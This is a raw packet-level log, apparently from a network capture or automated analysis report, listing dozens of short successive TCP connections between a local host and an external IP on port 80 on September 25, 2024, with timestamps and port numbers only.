              Sep 25, 2024 10:19:44.178639889 CEST4974280192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:44.183588028 CEST8049742188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:44.183722019 CEST4974280192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:44.185964108 CEST4974280192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:44.190819979 CEST8049742188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:44.190956116 CEST4974280192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:44.196773052 CEST8049742188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:44.852020025 CEST8049742188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:44.852238894 CEST4974280192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:44.852570057 CEST8049742188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:44.852642059 CEST4974280192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:44.857234001 CEST8049742188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:45.004328012 CEST4974380192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:45.009592056 CEST8049743188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:45.009705067 CEST4974380192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:45.011918068 CEST4974380192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:45.016716957 CEST8049743188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:45.016788960 CEST4974380192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:45.021563053 CEST8049743188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:45.666337013 CEST8049743188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:45.666426897 CEST4974380192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:45.666753054 CEST8049743188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:45.666800022 CEST4974380192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:45.671293020 CEST8049743188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:45.816442966 CEST4974480192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:45.821449041 CEST8049744188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:45.821676970 CEST4974480192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:45.823864937 CEST4974480192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:45.828651905 CEST8049744188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:45.828744888 CEST4974480192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:45.833647966 CEST8049744188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:46.545284986 CEST8049744188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:46.545471907 CEST4974480192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:46.545574903 CEST8049744188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:46.545643091 CEST4974480192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:46.551465034 CEST8049744188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:46.699840069 CEST4974580192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:46.704660892 CEST8049745188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:46.704757929 CEST4974580192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:46.706866026 CEST4974580192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:46.711643934 CEST8049745188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:46.711711884 CEST4974580192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:46.716521025 CEST8049745188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:47.442342997 CEST8049745188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:47.442358971 CEST8049745188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:47.442426920 CEST4974580192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:47.442451954 CEST8049745188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:47.442490101 CEST4974580192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:47.447756052 CEST8049745188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:47.581069946 CEST4974680192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:47.585891008 CEST8049746188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:47.585978031 CEST4974680192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:47.588154078 CEST4974680192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:47.595316887 CEST8049746188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:47.595407009 CEST4974680192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:47.600233078 CEST8049746188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:48.276973009 CEST8049746188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:48.277146101 CEST4974680192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:48.277904034 CEST8049746188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:48.277961016 CEST4974680192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:48.282001019 CEST8049746188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:48.425143003 CEST4974780192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:48.429965019 CEST8049747188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:48.430049896 CEST4974780192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:48.432363987 CEST4974780192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:48.437269926 CEST8049747188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:48.437320948 CEST4974780192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:48.442161083 CEST8049747188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:49.076529980 CEST8049747188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:49.076735973 CEST4974780192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:49.077385902 CEST8049747188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:49.077481031 CEST4974780192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:49.081572056 CEST8049747188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:49.221776962 CEST4974880192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:49.226634979 CEST8049748188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:49.226722956 CEST4974880192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:49.228828907 CEST4974880192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:49.234637976 CEST8049748188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:49.234721899 CEST4974880192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:49.241332054 CEST8049748188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:49.885318041 CEST8049748188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:49.885437965 CEST4974880192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:49.885584116 CEST8049748188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:49.885636091 CEST4974880192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:49.890229940 CEST8049748188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:50.033509016 CEST4974980192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:50.038467884 CEST8049749188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:50.038557053 CEST4974980192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:50.040664911 CEST4974980192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:50.049174070 CEST8049749188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:50.049266100 CEST4974980192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:50.054066896 CEST8049749188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:50.708355904 CEST8049749188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:50.708564997 CEST4974980192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:50.708842993 CEST8049749188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:50.708894968 CEST4974980192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:50.713444948 CEST8049749188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:50.846054077 CEST4975080192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:50.851042032 CEST8049750188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:50.851104021 CEST4975080192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:50.853298903 CEST4975080192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:50.858089924 CEST8049750188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:50.858143091 CEST4975080192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:51.172909975 CEST4975080192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:51.210522890 CEST8049750188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:51.210558891 CEST8049750188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:51.507719040 CEST8049750188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:51.507811069 CEST8049750188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:51.507839918 CEST4975080192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:51.507873058 CEST4975080192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:51.512658119 CEST8049750188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:51.644330978 CEST4975180192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:51.650954008 CEST8049751188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:51.651196003 CEST4975180192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:51.653358936 CEST4975180192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:51.659730911 CEST8049751188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:51.659792900 CEST4975180192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:51.665824890 CEST8049751188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:52.349291086 CEST8049751188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:52.350276947 CEST8049751188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:52.350336075 CEST4975180192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:52.351116896 CEST4975180192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:52.356086016 CEST8049751188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:52.621645927 CEST4975280192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:52.627418995 CEST8049752188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:52.627491951 CEST4975280192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:52.629637957 CEST4975280192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:52.634536028 CEST8049752188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:52.634584904 CEST4975280192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:52.639468908 CEST8049752188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:53.355499029 CEST8049752188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:53.355659008 CEST4975280192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:53.355894089 CEST8049752188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:53.355947018 CEST4975280192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:53.360531092 CEST8049752188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:53.510644913 CEST4975380192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:53.515615940 CEST8049753188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:53.515698910 CEST4975380192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:53.518424034 CEST4975380192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:53.523278952 CEST8049753188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:53.523329020 CEST4975380192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:53.528107882 CEST8049753188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:54.186008930 CEST8049753188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:54.186674118 CEST8049753188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:54.186779976 CEST4975380192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:54.186830997 CEST4975380192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:54.191773891 CEST8049753188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:54.332768917 CEST4975480192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:54.528970003 CEST8049754188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:54.529104948 CEST4975480192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:54.531418085 CEST4975480192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:54.536341906 CEST8049754188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:54.536452055 CEST4975480192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:54.541207075 CEST8049754188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:55.325730085 CEST8049754188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:55.325745106 CEST8049754188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:55.325753927 CEST8049754188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:55.325978041 CEST4975480192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:55.326045036 CEST4975480192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:55.331029892 CEST8049754188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:55.473229885 CEST4975580192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:55.478171110 CEST8049755188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:55.478317022 CEST4975580192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:55.480483055 CEST4975580192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:55.485536098 CEST8049755188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:55.485677958 CEST4975580192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:55.490452051 CEST8049755188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:56.126749992 CEST8049755188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:56.126948118 CEST4975580192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:56.127538919 CEST8049755188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:56.127618074 CEST4975580192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:56.131912947 CEST8049755188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:56.279055119 CEST4975680192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:56.284313917 CEST8049756188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:56.284413099 CEST4975680192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:56.296606064 CEST4975680192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:56.301561117 CEST8049756188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:56.301649094 CEST4975680192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:56.306524992 CEST8049756188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:57.009186983 CEST8049756188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:57.009360075 CEST4975680192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:57.009994984 CEST8049756188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:57.010046005 CEST4975680192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:57.014225960 CEST8049756188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:57.160433054 CEST4975780192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:57.165360928 CEST8049757188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:57.165451050 CEST4975780192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:57.167869091 CEST4975780192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:57.172713995 CEST8049757188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:57.172763109 CEST4975780192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:57.177618027 CEST8049757188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:58.849462032 CEST8049757188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:58.849488020 CEST8049757188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:58.849551916 CEST8049757188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:58.849605083 CEST4975780192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:58.849621058 CEST8049757188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:58.849646091 CEST4975780192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:58.849661112 CEST4975780192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:58.849693060 CEST4975780192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:58.849971056 CEST8049757188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:58.850013018 CEST4975780192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:58.854919910 CEST8049757188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:58.988655090 CEST4975880192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:58.993724108 CEST8049758188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:58.993856907 CEST4975880192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:58.995986938 CEST4975880192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:59.000869036 CEST8049758188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:59.000978947 CEST4975880192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:59.005748034 CEST8049758188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:59.725168943 CEST8049758188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:59.726007938 CEST8049758188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:59.726090908 CEST4975880192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:59.731724977 CEST4975880192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:59.736725092 CEST8049758188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:59.879787922 CEST4975980192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:59.884758949 CEST8049759188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:59.884875059 CEST4975980192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:59.886976004 CEST4975980192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:59.891834021 CEST8049759188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:59.891904116 CEST4975980192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:59.896770954 CEST8049759188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:00.560081959 CEST8049759188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:00.560306072 CEST4975980192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:00.560571909 CEST8049759188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:00.560626030 CEST4975980192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:00.565087080 CEST8049759188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:00.707006931 CEST4976080192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:00.711896896 CEST8049760188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:00.712003946 CEST4976080192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:00.714145899 CEST4976080192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:00.718899012 CEST8049760188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:00.718977928 CEST4976080192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:00.723732948 CEST8049760188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:01.361571074 CEST8049760188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:01.361670971 CEST4976080192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:01.361841917 CEST8049760188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:01.361877918 CEST4976080192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:01.366739988 CEST8049760188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:01.512365103 CEST4976180192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:01.517683029 CEST8049761188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:01.517771006 CEST4976180192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:01.519893885 CEST4976180192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:01.526101112 CEST8049761188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:01.526168108 CEST4976180192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:01.532051086 CEST8049761188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:02.228873014 CEST8049761188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:02.229063034 CEST4976180192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:02.229166031 CEST8049761188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:02.229209900 CEST4976180192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:02.233937979 CEST8049761188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:02.379710913 CEST4976380192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:02.384671926 CEST8049763188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:02.384795904 CEST4976380192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:02.387046099 CEST4976380192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:02.391973972 CEST8049763188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:02.392071009 CEST4976380192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:02.396989107 CEST8049763188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:03.088596106 CEST8049763188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:03.088731050 CEST4976380192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:03.089360952 CEST8049763188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:03.089406967 CEST4976380192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:03.093667030 CEST8049763188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:03.245127916 CEST4976480192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:03.250097990 CEST8049764188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:03.250168085 CEST4976480192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:03.252350092 CEST4976480192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:03.257210016 CEST8049764188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:03.257255077 CEST4976480192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:03.262145996 CEST8049764188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:03.904649973 CEST8049764188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:03.904946089 CEST4976480192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:03.905018091 CEST8049764188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:03.905067921 CEST4976480192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:03.909832001 CEST8049764188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:04.054486990 CEST4976580192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:04.059503078 CEST8049765188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:04.063270092 CEST4976580192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:04.065716028 CEST4976580192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:04.070597887 CEST8049765188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:04.071219921 CEST4976580192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:04.076034069 CEST8049765188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:04.881788015 CEST8049765188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:04.881977081 CEST4976580192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:04.883076906 CEST8049765188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:04.883135080 CEST4976580192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:04.887902975 CEST8049765188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:05.018069983 CEST4976680192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:05.023005009 CEST8049766188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:05.023112059 CEST4976680192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:05.025248051 CEST4976680192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:05.030035973 CEST8049766188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:05.030103922 CEST4976680192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:05.034945011 CEST8049766188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:05.709095001 CEST8049766188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:05.709217072 CEST8049766188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:05.709216118 CEST4976680192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:05.709268093 CEST4976680192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:05.714461088 CEST8049766188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:05.846661091 CEST4976780192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:05.851612091 CEST8049767188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:05.851725101 CEST4976780192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:05.853837013 CEST4976780192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:05.858674049 CEST8049767188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:05.858736992 CEST4976780192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:05.863581896 CEST8049767188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:06.566374063 CEST8049767188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:06.566708088 CEST8049767188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:06.566812992 CEST4976780192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:06.566813946 CEST4976780192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:06.571759939 CEST8049767188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:06.706192970 CEST4976880192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:06.711157084 CEST8049768188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:06.711266994 CEST4976880192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:06.713376999 CEST4976880192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:06.718154907 CEST8049768188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:06.718238115 CEST4976880192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:06.723077059 CEST8049768188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:07.429567099 CEST8049768188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:07.429641962 CEST8049768188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:07.429764986 CEST4976880192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:07.429879904 CEST4976880192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:07.434670925 CEST8049768188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:07.570648909 CEST4976980192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:07.575587034 CEST8049769188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:07.575809956 CEST4976980192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:07.577991962 CEST4976980192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:07.582880974 CEST8049769188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:07.582940102 CEST4976980192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:07.587753057 CEST8049769188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:09.278275013 CEST8049769188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:09.278625965 CEST8049769188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:09.278626919 CEST4976980192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:09.278669119 CEST4976980192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:09.283550978 CEST8049769188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:09.429056883 CEST4977080192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:09.434104919 CEST8049770188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:09.434235096 CEST4977080192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:09.436377048 CEST4977080192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:09.443525076 CEST8049770188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:09.443638086 CEST4977080192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:09.448575974 CEST8049770188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:10.191735029 CEST8049770188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:10.191854954 CEST4977080192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:10.192042112 CEST8049770188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:10.192092896 CEST4977080192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:10.196688890 CEST8049770188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:10.331124067 CEST4977180192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:10.336486101 CEST8049771188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:10.336575031 CEST4977180192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:10.338665962 CEST4977180192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:10.343506098 CEST8049771188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:10.343573093 CEST4977180192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:10.348541975 CEST8049771188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:11.008219957 CEST8049771188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:11.008414984 CEST4977180192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:11.008714914 CEST8049771188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:11.008768082 CEST4977180192.168.2.7188.114.97.3
